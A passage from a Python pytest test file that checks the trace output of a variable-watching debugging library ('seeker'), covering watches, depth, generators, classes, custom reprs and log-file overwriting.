assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry(),
VariableEntry("_d"),
VariableEntry("_d['a']", "1"),
VariableEntry("_d['b']", "2"),
LineEntry(),
VariableEntry("_s"),
VariableEntry("_s.x", "3"),
VariableEntry("_s.y", "4"),
LineEntry(),
VariableEntry("_lst"),
VariableEntry("_lst[997]", "997"),
VariableEntry("_lst[998]", "998"),
VariableEntry("_lst[999]", "999"),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_variables_classes_with_others():
class WithSlots(object):
__slots__ = ("x", "y")
def __init__(self):
self.x = 3
self.y = 4
@seeker.tracer(
seeker.Keys("_d", exclude="c"),
seeker.Attrs("_d"), # doesn't have attributes
seeker.Attrs("_s"),
seeker.Indices("_lst")[-3:],
only_watch=False,
)
def my_function():
_d = {"a": 1, "b": 2, "c": "ignore"}
_s = WithSlots()
_lst = list(range(1000))
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("WithSlots"),
CallEntry("def my_function():"),
LineEntry(),
VariableEntry("_d"),
VariableEntry("_d['a']", "1"),
VariableEntry("_d['b']", "2"),
LineEntry(),
VariableEntry("_s"),
VariableEntry("_s.x", "3"),
VariableEntry("_s.y", "4"),
LineEntry(),
VariableEntry("_lst"),
VariableEntry("_lst[997]", "997"),
VariableEntry("_lst[998]", "998"),
VariableEntry("_lst[999]", "999"),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_single_keyword_watch_no_comma_only():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@seeker.tracer(watch="foo")
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry("foo = Foo()"),
VariableEntry("foo"),
LineEntry(),
LineEntry(),
LineEntry(),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_single_watch_no_comma_only():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@seeker.tracer("foo")
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry("foo = Foo()"),
VariableEntry("foo"),
LineEntry(),
LineEntry(),
LineEntry(),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_single_keyword_watch_no_comma_with_others():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@seeker.tracer(watch="foo", only_watch=False)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("Foo"),
CallEntry("def my_function():"),
LineEntry("foo = Foo()"),
VariableEntry("foo"),
LineEntry(),
VariableEntry("i", "0"),
LineEntry(),
LineEntry(),
VariableEntry("i", "1"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_long_variable(long_arr_value):
@seeker.tracer("foo")
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r"^(?=.{100}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$"
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry("foo = list(range(1000))"),
VariableEntry("foo", value=long_arr_value),
LineEntry(),
ReturnEntry(),
# TODO: use the shortish value or the original value
ReturnValueEntry(value_regex=regex),
ElapsedTimeEntry(),
),
)
def test_long_variable_with_custom_max_variable_length(long_arr_value):
@seeker.tracer("foo", max_variable_length=200)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r"^(?=.{200}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$"
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry("foo = list(range(1000))"),
VariableEntry("foo", value=long_arr_value),
LineEntry(),
ReturnEntry(),
# TODO here is a bug: if you don't specify 'foo' in watch, the return value is a full-length arr;
# however, if you do specify the watch value, the return is a shortish repr
ReturnValueEntry(value_regex=regex),
ElapsedTimeEntry(),
),
)
def test_long_variable_with_infinite_max_variable_length():
@seeker.tracer("foo", max_variable_length=None)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
# TODO LMAO, I definitely need to learn regular exp
regex = r"^(?=.{1000,100000}$)\[0, 1, 2, [^.]+ 997, 998, 999\]$"
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry("foo = list(range(1000))"),
VariableEntry("foo", value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex),
ElapsedTimeEntry(),
),
)
def test_repr_exception():
class Bad(object):
def __repr__(self):
1 / 0
@seeker.tracer("bad")
def my_function():
bad = Bad()
with mini_toolbox.OutputCapturer(stdout=False) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry("bad = Bad()"),
# TODO should I change the bad repr thing?
VariableEntry("bad", value="REPR FAILED"),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_depth():
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
@seeker.tracer(output=string_io, depth=3, only_watch=False)
def f1(x1):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
CallEntry("def f1(x1):"),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry("def f2(x2):"),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry("def f3(x3):"),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("20"),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("20"),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("20"),
ElapsedTimeEntry(),
),
)
@pytest.mark.skip(reason="Use custom prefix as identifier")
def test_method_and_prefix():
class Baz(object):
def __init__(self):
self.x = 2
@seeker.tracer(watch=("self.x",), prefix="ZZZ", only_watch=False)
def square(self):
foo = 7
self.x **= 2
return self
baz = Baz()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = baz.square()
assert result is baz
assert result.x == 4
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(prefix="ZZZ"),
VariableEntry("self", prefix="ZZZ"),
VariableEntry("self.x", "2", prefix="ZZZ"),
CallEntry("def square(self):", prefix="ZZZ"),
LineEntry("foo = 7", prefix="ZZZ"),
VariableEntry("foo", "7", prefix="ZZZ"),
LineEntry("self.x **= 2", prefix="ZZZ"),
VariableEntry("self.x", "4", prefix="ZZZ"),
LineEntry(prefix="ZZZ"),
ReturnEntry(prefix="ZZZ"),
ReturnValueEntry(prefix="ZZZ"),
ElapsedTimeEntry(prefix="ZZZ"),
),
prefix="ZZZ",
)
def test_file_output():
with mini_toolbox.create_temp_folder(prefix="seeker") as folder:
path = folder / "foo.log"
@seeker.tracer(output=path, only_watch=False)
def my_function(_foo):
x = 7
y = 8
return y + x
result = my_function("baba")
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("_foo", value_regex="u?'baba'"),
CallEntry("def my_function(_foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_confusing_decorator_lines():
string_io = io.StringIO()
def empty_decorator(function):
return function
@empty_decorator
@seeker.tracer(
"foo", "x", "y", "bar", output=string_io, depth=2
) # Multi-line decorator for extra confusion!
@empty_decorator
@empty_decorator
def my_function(foo):
x = lambda bar: 7
y = 8
return y + x(foo)
result = my_function("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
LineEntry(),
# inside lambda
VariableEntry("bar", value_regex="u?'baba'"),
CallEntry("x = lambda bar: 7"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("7"),
# back in my_function
ReturnEntry(),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_lambda():
string_io = io.StringIO()
my_function = seeker.tracer("x", output=string_io)(lambda x: x ** 2)
result = my_function(7)
assert result == 49
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("x", "7"),
CallEntry(source_regex="^my_function = seeker.*"),
LineEntry(source_regex="^my_function = seeker.*"),
ReturnEntry(source_regex="^my_function = seeker.*"),
ReturnValueEntry("49"),
ElapsedTimeEntry(),
),
)
def test_unavailable_source():
with mini_toolbox.create_temp_folder(
prefix="seeker"
) as folder, mini_toolbox.TempSysPathAdder(str(folder)):
module_name = "iaerojajsijf"
python_file_path = folder / ("%s.py" % (module_name,))
# ideas: this imports the module dynamically; the same method can be used to import other modules
content = textwrap.dedent(
u"""
from executor import seeker
from networkx import Node
node = Node('1')
@seeker.tracer(only_watch=False)
def f(x):
return x
node_id_list = [1, 2, 5, 7, 11]
node_list = []
for node_id in node_id_list:
node_list.append(Node(node_id))
"""
)
with python_file_path.open("w") as python_file:
python_file.write(content)
module = import_module(module_name)
python_file_path.unlink()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = getattr(module, "f")(7)
node = getattr(module, "node_list")
assert result == 7
assert str(node) == "[1, 2, 5, 7, 11]"
output = output_capturer.output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(stage="starting"),
CallEntry("SOURCE IS UNAVAILABLE"),
LineEntry("SOURCE IS UNAVAILABLE"),
ReturnEntry("SOURCE IS UNAVAILABLE"),
ReturnValueEntry("7"),
ElapsedTimeEntry(),
),
)
def test_no_overwrite_by_default():
with mini_toolbox.create_temp_folder(prefix="seeker") as folder:
path = folder / "foo.log"
with path.open("w") as output_file:
output_file.write(u"lala")
@seeker.tracer(output=str(path), only_watch=False)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function("baba")
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert output.startswith("lala")
shortened_output = output[4:]
assert_output(
shortened_output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_overwrite():
with mini_toolbox.create_temp_folder(prefix="seeker") as folder:
path = folder / "foo.log"
with path.open("w") as output_file:
output_file.write(u"lala")
@seeker.tracer(output=str(path), overwrite=True, only_watch=False)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function("baba")
result = my_function("baba")
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert "lala" not in output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_error_in_overwrite_argument():
with mini_toolbox.create_temp_folder(prefix="seeker") as folder:
with pytest.raises(Exception, match="can only be used when writing"):
@seeker.tracer(overwrite=True, only_watch=False)
def my_function(foo):
x = 7
y = 8
return y + x
def test_needs_parentheses():
assert not needs_parentheses("x")
assert not needs_parentheses("x.y")
assert not needs_parentheses("x.y.z")
assert not needs_parentheses("x.y.z[0]")
assert not needs_parentheses("x.y.z[0]()")
assert not needs_parentheses("x.y.z[0]()(3, 4 * 5)")
assert not needs_parentheses("foo(x)")
assert not needs_parentheses("foo(x+y)")
assert not needs_parentheses("(x+y)")
assert not needs_parentheses("[x+1 for x in ()]")
assert needs_parentheses("x + y")
assert needs_parentheses("x * y")
assert needs_parentheses("x and y")
assert needs_parentheses("x if z else y")
def test_with_block():
# Testing that a single Tracer can handle many mixed uses
snoop = seeker.tracer(only_watch=False)
def foo(x):
if x == 0:
bar1(x)
qux()
return
with snoop:
# There should be line entries for these three lines,
# no line entries for anything else in this function,
# but calls to all bar functions should be traced
foo(x - 1)
bar2(x)
qux()
int(4)
bar3(9)
return x
@snoop
def bar1(_x):
qux()
@snoop
def bar2(_x):
qux()
@snoop
def bar3(_x):
qux()
def qux():
return 9 # not traced, mustn't show up
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = foo(2)
assert result == 2
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
# In first with
SourcePathEntry(),
VariableEntry("x", "2"),
VariableEntry("bar1"),
VariableEntry("bar2"),
VariableEntry("bar3"),
VariableEntry("foo"),
VariableEntry("qux"),
VariableEntry("snoop"),
LineEntry("foo(x - 1)"),
# In with in recursive call
VariableEntry("x", "1"),
VariableEntry("bar1"),
VariableEntry("bar2"),
VariableEntry("bar3"),
VariableEntry("foo"),
VariableEntry("qux"),
VariableEntry("snoop"),
LineEntry("foo(x - 1)"),
# Call to bar1 from if block outside with
VariableEntry("_x", "0"),
VariableEntry("qux"),
CallEntry("def bar1(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# In with in recursive call
LineEntry("bar2(x)"),
# Call to bar2 from within with
VariableEntry("_x", "1"),
VariableEntry("qux"),
CallEntry("def bar2(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# In with in recursive call
LineEntry("qux()"),
LineEntry(source_regex="with snoop:", min_python_version=(3, 10)),
ElapsedTimeEntry(),
# Call to bar3 from after with
VariableEntry("_x", "9"),
VariableEntry("qux"),
CallEntry("def bar3(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# -- Similar to previous few sections,
# -- but from first call to foo
# In with in first call
LineEntry("bar2(x)"),
# Call to bar2 from within with
VariableEntry("_x", "2"),
VariableEntry("qux"),
CallEntry("def bar2(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# In with in first call
LineEntry("qux()"),
LineEntry(source_regex="with snoop:", min_python_version=(3, 10)),
ElapsedTimeEntry(),
# Call to bar3 from after with
VariableEntry("_x", "9"),
VariableEntry("qux"),
CallEntry("def bar3(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_with_block_depth():
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
def f1(x1):
str(3)
with seeker.tracer(output=string_io, depth=3, only_watch=False):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
# the next entry corresponds to normalize=True, and we don't pass normalize in the
# with block in f1()
# VariableEntry(),
VariableEntry(),
LineEntry("result1 = f2(x1)"),
VariableEntry(),
VariableEntry(),
CallEntry("def f2(x2):"),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry("def f3(x3):"),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("20"),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("20"),
VariableEntry(min_python_version=(3, 10)),
LineEntry(source_regex="with seeker.tracer*", min_python_version=(3, 10)),
ElapsedTimeEntry(),
),
)
def test_cellvars():
string_io = io.StringIO()
def f2(a):
def f3(a):
x = 0
x += 1
def f4(a):
y = x
return 42
return f4(a)
return f3(a)
def f1(a):
# the sequence matters here,
with seeker.tracer(
"result1",
"f2",
"f3",
"f4",
"a",
"x",
"y",
"string_io",
output=string_io,
depth=4,
):
result1 = f2(a)
return result1
result = f1(42)
assert result == 42
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
# again, we don't have normalize here
# VariableEntry(),
VariableEntry(),
LineEntry("result1 = f2(a)"),
VariableEntry(),
CallEntry("def f2(a):"),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry("a"),
CallEntry("def f3(a):"),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
VariableEntry("x"),
CallEntry("def f4(a):"),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
VariableEntry(min_python_version=(3, 10)),
LineEntry(source_regex="with seeker.tracer*", min_python_version=(3, 10)),
ElapsedTimeEntry(),
),
)
def test_var_order():
string_io = io.StringIO()
def f(one, two, three, four):
five = None
six = None
seven = None
five, six, seven = 5, 6, 7
with seeker.tracer(
only_watch=False,
output=string_io,
depth=2,
):
result = f(1, 2, 3, 4)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
# again we don't have normalize
# VariableEntry(),
LineEntry("result = f(1, 2, 3, 4)"),
VariableEntry("one", "1"),
VariableEntry("two", "2"),
VariableEntry("three", "3"),
VariableEntry("four", "4"),
CallEntry("def f(one, two, three, four):"),
LineEntry(),
VariableEntry("five"),
LineEntry(),
VariableEntry("six"),
LineEntry(),
VariableEntry("seven"),
LineEntry(),
VariableEntry("five", "5"),
VariableEntry("six", "6"),
VariableEntry("seven", "7"),
ReturnEntry(),
ReturnValueEntry(),
VariableEntry("result", "None", min_python_version=(3, 10)),
LineEntry(source_regex="with seeker.tracer*", min_python_version=(3, 10)),
ElapsedTimeEntry(),
),
)
def test_truncate():
max_length = 20
for i in range(max_length * 2):
string = i * "a"
truncated = truncate(string, max_length)
if len(string) <= max_length:
assert string == truncated
else:
assert truncated == "aaaaaaaa...aaaaaaaaa"
assert len(truncated) == max_length
def test_indentation():
from .samples import indentation, recursion
assert_sample_output(indentation)
assert_sample_output(recursion)
def test_exception():
from .samples import exception
assert_sample_output(exception)
def test_generator():
string_io = io.StringIO()
original_tracer = sys.gettrace()
original_tracer_active = lambda: (sys.gettrace() is original_tracer)
@seeker.tracer(only_watch=False, output=string_io)
# thoughts: a few pitfalls here
# > first, `original_tracer_active` is not defined in the function; it lives in the function's closure.
# if you want to trace it, `original_tracer_active` should also be included in the watch list
# > second, the assertions also create new variables. In the following code,
# `@py_assert1` and `@py_assert3` are temporaries created by pytest's assertion rewriting
def f(x1):
assert not original_tracer_active()
x2 = yield x1
assert not original_tracer_active()
x3 = "foo"
assert not original_tracer_active()
x4 = yield 2
assert not original_tracer_active()
return
assert original_tracer_active()
generator = f(0)
assert original_tracer_active()
first_item = next(generator)
assert original_tracer_active()
assert first_item == 0
second_item = generator.send("blabla")
assert original_tracer_active()
assert second_item == 2
with pytest.raises(StopIteration) as exc_info:
generator.send("looloo")
assert original_tracer_active()
# thoughts: interesting
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("x1", "0"),
VariableEntry(),
CallEntry(),
LineEntry(),
VariableEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("0"),
ElapsedTimeEntry(),
# Pause and resume:
VariableEntry("x1", "0"),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry("x2", "'blabla'"),
LineEntry(),
LineEntry(),
VariableEntry("x3", "'foo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("2"),
ElapsedTimeEntry(),
# Pause and resume:
VariableEntry("x1", "0"),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry("x4", "'looloo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(None),
ElapsedTimeEntry(),
),
)
def test_custom_repr():
string_io = io.StringIO()
def large(l):
return isinstance(l, list) and len(l) > 5
def print_list_size(l):
return "list(size={})".format(len(l))
def print_dict(d):
return "dict(keys={})".format(sorted(list(d.keys())))
def evil_condition(x):
return large(x) or isinstance(x, dict)
@seeker.tracer(
output=string_io,
custom_repr=(
(large, print_list_size),
(dict, print_dict),
(evil_condition, lambda x: "I am evil"),
),
only_watch=False,
)
def sum_to_x(x):
l = list(range(x))
a = {"1": 1, "2": 2}
return sum(l)
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("x", "10000"),
CallEntry(),
LineEntry(),
VariableEntry("l", "list(size=10000)"),
LineEntry(),
VariableEntry("a", "dict(keys=['1', '2'])"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("49995000"),
ElapsedTimeEntry(),
),
)
def test_custom_repr_single():
string_io = io.StringIO()
@seeker.tracer(
output=string_io, custom_repr=(list, lambda l: "foofoo!"), only_watch=False
)
def sum_to_x(x):
l = list(range(x))
return 7
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("x", "10000"),
CallEntry(),
LineEntry(),
VariableEntry("l", "foofoo!"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("7"),
ElapsedTimeEntry(),
),
)
def test_disable():
string_io = io.StringIO()
def my_function(foo):
x = 7
y = 8
return x + y
with mini_toolbox.TempValueSetter((seeker.sight, "DISABLED"), True):
tracer = seeker.tracer(output=string_io)
with tracer:
result = my_function("baba")
my_decorated_function = tracer(my_function)
my_decorated_function("booboo")
output = string_io.getvalue()
assert not output
# -k 'test_class'
def test_class():
string_io = io.StringIO()
@seeker.tracer(output=string_io, only_watch=False)
class MyClass(object):
def __init__(self):
self.x = 7
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("self", value_regex="u?.+MyClass object"),
CallEntry("def __init__(self):"),
LineEntry("self.x = 7"),
ReturnEntry("self.x = 7"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
VariableEntry("self", value_regex="u?.+MyClass object"),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_method(self, foo):"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + self.x"),
ReturnEntry("return y + self.x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_class_with_decorated_method():
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@seeker.tracer(output=string_io, only_watch=False)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("self", value_regex="u?.+MyClass object"),
CallEntry("def __init__(self):"),
LineEntry("self.x = 7"),
ReturnEntry("self.x = 7"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
VariableEntry("args", value_regex=r"\(<.+>, 'baba'\)"),
VariableEntry("kwargs", value_regex=r"\{\}"),
VariableEntry("function", value_regex="u?.+my_method"),
CallEntry("def wrapper(*args, **kwargs):"),
LineEntry("result = function(*args, **kwargs)"),
VariableEntry("result", "15"),
LineEntry("return result"),
ReturnEntry("return result"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_class_with_decorated_method_and_snoop_applied_to_method():
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@seeker.tracer(output=string_io, only_watch=False)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
@seeker.tracer(output=string_io, only_watch=False)
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("self", value_regex="u?.*MyClass object"),
CallEntry("def __init__(self):"),
LineEntry("self.x = 7"),
ReturnEntry("self.x = 7"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
VariableEntry("args", value_regex=r"u?\(<.+>, 'baba'\)"),
VariableEntry("kwargs", value_regex=r"u?\{\}"),
VariableEntry("function", value_regex="u?.*my_method"),
CallEntry("def wrapper(*args, **kwargs):"),
LineEntry("result = function(*args, **kwargs)"),
SourcePathEntry(),
VariableEntry("self", value_regex="u?.*MyClass object"),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_method(self, foo):"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + self.x"),
ReturnEntry("return y + self.x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
VariableEntry("result", "15"),
LineEntry("return result"),
ReturnEntry("return result"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_class_with_property():
string_io = io.StringIO()
@seeker.tracer(output=string_io, only_watch=False)
class MyClass(object):
def __init__(self):
self._x = 0
def plain_method(self):
pass
@property
def x(self):
self.plain_method()
return self._x
@x.setter
def x(self, value):
self.plain_method()
self._x = value
@x.deleter
def x(self):
self.plain_method()
del self._x
instance = MyClass()
# Do simple property operations, make sure we didn't mess up the normal behavior
result = instance.x
assert result == instance._x
instance.x = 1
assert instance._x == 1
del instance.x
with pytest.raises(AttributeError):
instance._x
# The property methods will not be traced, but their calls to plain_method will be.
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("self", value_regex="u?.*MyClass object"),
CallEntry("def __init__(self):"),
LineEntry("self._x = 0"),
ReturnEntry("self._x = 0"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# Called from getter
VariableEntry("self", value_regex="u?.*MyClass object"),
CallEntry("def plain_method(self):"),
LineEntry("pass"),
ReturnEntry("pass"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# Called from setter
VariableEntry("self", value_regex="u?.*MyClass object"),
CallEntry("def plain_method(self):"),
LineEntry("pass"),
ReturnEntry("pass"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# Called from deleter
VariableEntry("self", value_regex="u?.*MyClass object"),
CallEntry("def plain_method(self):"),
LineEntry("pass"),
ReturnEntry("pass"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_snooping_on_class_does_not_cause_base_class_to_be_snooped():
string_io = io.StringIO()
class UnsnoopedBaseClass(object):
def __init__(self):
self.method_on_base_class_was_called = False
def method_on_base_class(self):
self.method_on_base_class_was_called = True
@seeker.tracer(output=string_io, only_watch=False)
class MyClass(UnsnoopedBaseClass):
def method_on_child_class(self):
self.method_on_base_class()
instance = MyClass()
assert not instance.method_on_base_class_was_called
instance.method_on_child_class()
assert instance.method_on_base_class_was_called
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("self", value_regex="u?.*MyClass object"),
CallEntry("def method_on_child_class(self):"),
LineEntry("self.method_on_base_class()"),
ReturnEntry("self.method_on_base_class()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
@pytest.mark.skip(reason="No normalization")
def test_normalize():
string_io = io.StringIO()
class A:
def __init__(self, a):
self.a = a
@seeker.tracer(output=string_io)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
add()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry("test_pysnooper.py"),
VariableEntry("A", value_regex=r"<class .*\.A.?>"),
CallEntry("def add():"),
LineEntry("a = A(19)"),
VariableEntry("a", value_regex=r"<.*\.A (?:object|instance)>"),
LineEntry("b = A(22)"),
VariableEntry("b", value_regex=r"<.*\.A (?:object|instance)>"),
LineEntry("res = a.a + b.a"),
VariableEntry("res", value="41"),
LineEntry("return res"),
ReturnEntry("return res"),
ReturnValueEntry("41"),
ElapsedTimeEntry(),
),
)
@pytest.mark.skip(reason="No normalization")
def test_normalize_prefix():
string_io = io.StringIO()
_prefix = "ZZZZ"
class A:
def __init__(self, a):
self.a = a
